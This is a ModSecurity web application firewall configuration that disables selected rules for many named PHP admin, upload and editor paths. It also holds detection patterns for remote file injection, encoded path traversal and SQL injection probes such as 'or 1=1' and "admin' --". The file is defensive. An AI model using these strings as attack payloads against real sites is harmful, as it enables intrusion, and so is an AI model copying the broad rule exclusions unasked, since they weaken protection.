SecRule REQUEST_FILENAME "/nucleus/index\.php" "phase:2,id:92003,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/save_post\.php" "phase:2,id:92004,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/provider/offers\.php" "phase:2,id:92005,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/plugins/wp-slimstat/wp-slimstat-js\.php" "phase:2,id:92006,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/editor/sitemanger/index\.php" "phase:2,id:92007,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/addclientvideo\.php" "phase:2,id:92008,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/single_upload\.php" "phase:2,id:92009,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/betrieb\.php" "phase:2,id:92010,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/wiki/lib/exe/fetch\.php" "phase:2,id:92011,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/wp-admin/press-this\.php" "phase:2,id:92012,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/pagine\.php" "phase:2,id:92013,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin/order-categories\.php" "phase:2,id:92014,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"

SecRule REQUEST_FILENAME "/livehelp/" "phase:2,id:92015,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/livehelp/" "phase:2,id:92016,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/livehelpnew/" "phase:2,id:92017,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/livehelpnew/" "phase:2,id:92018,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/raidlogimport/admin/dkp\.php" "phase:2,id:92019,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/p\.php" "phase:2,id:92020,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:92021,t:none,pass,nolog,skipAfter:END_RULES_92021"


SecRule REQUEST_URI|ARGS|!ARGS:t|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:378451,phase:2,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{MATCHED_VAR}',chain"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"


SecMarker END_RULES_92021

SecRule REQUEST_FILENAME "/admincp/verticalresponse\.php" "phase:2,id:92022,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572"

SecRule REQUEST_FILENAME "/admin/editart\.php" "phase:2,id:92023,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/panel/content/itinerary\.php" "phase:2,id:92024,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/adminmailing\.php" "phase:2,id:92025,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/homepageedit\.php" "phase:2,id:92026,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/jobedit\.php" "phase:2,id:92027,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/media-upload\.php" "phase:2,id:92028,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=390707"

SecRule REQUEST_FILENAME "/ndxz-studio" "phase:2,id:92029,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/ndxzstudio" "phase:2,id:92030,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/json\.php" "phase:2,id:92031,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/_salvaxml\.php" "phase:2,id:92032,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/imp/imple\.php" "phase:2,id:92033,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/cms/settings\.php" "phase:2,id:92034,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/destination-edit\.php" "phase:2,id:92035,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/posthtml\.php" "phase:2,id:92036,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/template_edit\.asp" "phase:2,id:92037,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390727"

SecRule REQUEST_FILENAME "/question/edit\.php" "phase:2,id:92038,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/cgi-bin/menu\.pl" "phase:2,id:92039,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/add_article\.php" "phase:2,id:92040,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/update\.php" "phase:2,id:92041,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/wp-content/plugins/contactme/xd_receiver\.php" "phase:2,id:92042,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/edit_home\.php" "phase:2,id:92043,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/update-news\.php" "phase:2,id:92044,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/mod/quiz/attempt\.php" "phase:2,id:92045,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/linnworks_xml\.php" "phase:2,id:92046,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=380018"

SecRule REQUEST_FILENAME "/order/saveeshop" "phase:2,id:92047,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/comments\.php" "phase:2,id:92048,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"
SecAction "phase:2,id:92049,t:none,pass,nolog,skipAfter:END_RULES_92049"

SecRule ARGS|!ARGS:/^resp/|!ARGS:rpath|!ARGS:data|!ARGS:/body/|!ARGS:editor1|!ARGS:/sidebar/|!ARGS:/template/|!ARGS:/desc/|!ARGS:resolution|!ARGS:/problem/|!ARGS:/solution/|!ARGS:/^style_options/|!ARGS:/CACHE_PATH/|!ARGS:connector|!ARGS:/comment/|!ARGS:obrazek|!ARGS:/txt/|!ARGS:keywords|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:body|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:/content/ "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"  	"deny,log,auditlog,status:403,t:none,t:lowercase,capture,id:343307,phase:2,rev:39,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied',logdata:'%{TX.0}'"

SecMarker END_RULES_92049

SecRule REQUEST_FILENAME "/viewraid\.php" "phase:2,id:92050,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/twitter/tweets-grab\.php" "phase:2,id:92051,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/admin/set_label\.php" "phase:2,id:92052,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/index\.php/profile/register/registerprofile" "phase:2,id:92053,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/code_editor\.php" "phase:2,id:92054,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=380018-380021,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340006-340007,ctl:ruleRemovebyID=340011,ctl:ruleRemovebyID=340014,ctl:ruleRemovebyID=340193,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340021,ctl:ruleRemovebyID=340027,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340118,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=340131,ctl:ruleRemovebyID=340133,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=380006,ctl:ruleRemovebyID=390709,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=390801,ctl:ruleRemovebyID=390810,ctl:ruleRemovebyID=393449"

SecRule REQUEST_FILENAME "/popeditmarker\.php" "phase:2,id:92055,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/connectors/security/access/policy/template\.php" "phase:2,id:92056,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/modiwats\.php" "phase:2,id:92057,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380016,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340009"

SecRule REQUEST_FILENAME "/php-stats\.php" "phase:2,id:92058,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/banner-edit\.php" "phase:2,id:92059,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/content-edit\.php" "phase:2,id:92060,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/paymentrecall\.php" "phase:2,id:92061,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/hostmeinadmin/clientshosting\.php" "phase:2,id:92062,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/processwire/page/edit" "phase:2,id:92063,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/general_settings\.php" "phase:2,id:92064,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/adclick\.php" "phase:2,id:92065,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin_edit_cat\.php" "phase:2,id:92066,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/listings/client\.php" "phase:2,id:92067,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:92068,t:none,pass,nolog,skipAfter:END_RULES_92068"

SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/file/|!ARGS:info "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:336133,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/file/|!ARGS:info "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:336134,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"


SecMarker END_RULES_92068

SecRule REQUEST_FILENAME "/kontaktformular_web-plaaning\.php" "phase:2,id:92069,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/web-planning\.php" "phase:2,id:92070,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/shop/remote\.php" "phase:2,id:92071,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390703"
SecAction "phase:2,id:92072,t:none,pass,nolog,skipAfter:END_RULES_92072"

SecRule ARGS|XML:/*|!ARGS:/^products/ "(?:or.+1[[:space:]]*=[[:space:]]1|or 1=[0-9]|admin'(?: --| #)| or '1'='1--|having 1 ?= ?1 --|or\+1=[0-9]|null is null ?--|\b(\d+) ?(?:=|<>|<=>|!=) ?[1-3]\b)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhitespace,capture,id:380572,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  SQL injection probe',logdata:'%{TX.0}'"

SecMarker END_RULES_92072

SecRule REQUEST_FILENAME "/beta_add_record\.php" "phase:2,id:92073,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/echeck_receipt\.php" "phase:2,id:92074,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/livehelp/send\.php" "phase:2,id:92075,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/tweets-grab-ldn\.php" "phase:2,id:92076,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:92077,t:none,pass,nolog,skipAfter:END_RULES_92077"


SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:api "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:336135,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:api "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:336136,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"


SecMarker END_RULES_92077

SecRule REQUEST_FILENAME "/receipt\.php" "phase:2,id:92078,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:92079,t:none,pass,nolog,skipAfter:END_RULES_92079"


SecRule REQUEST_URI|ARGS|!ARGS:/^list/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/img/|!ARGS:api|!ARGS:/uri/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:336137,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"

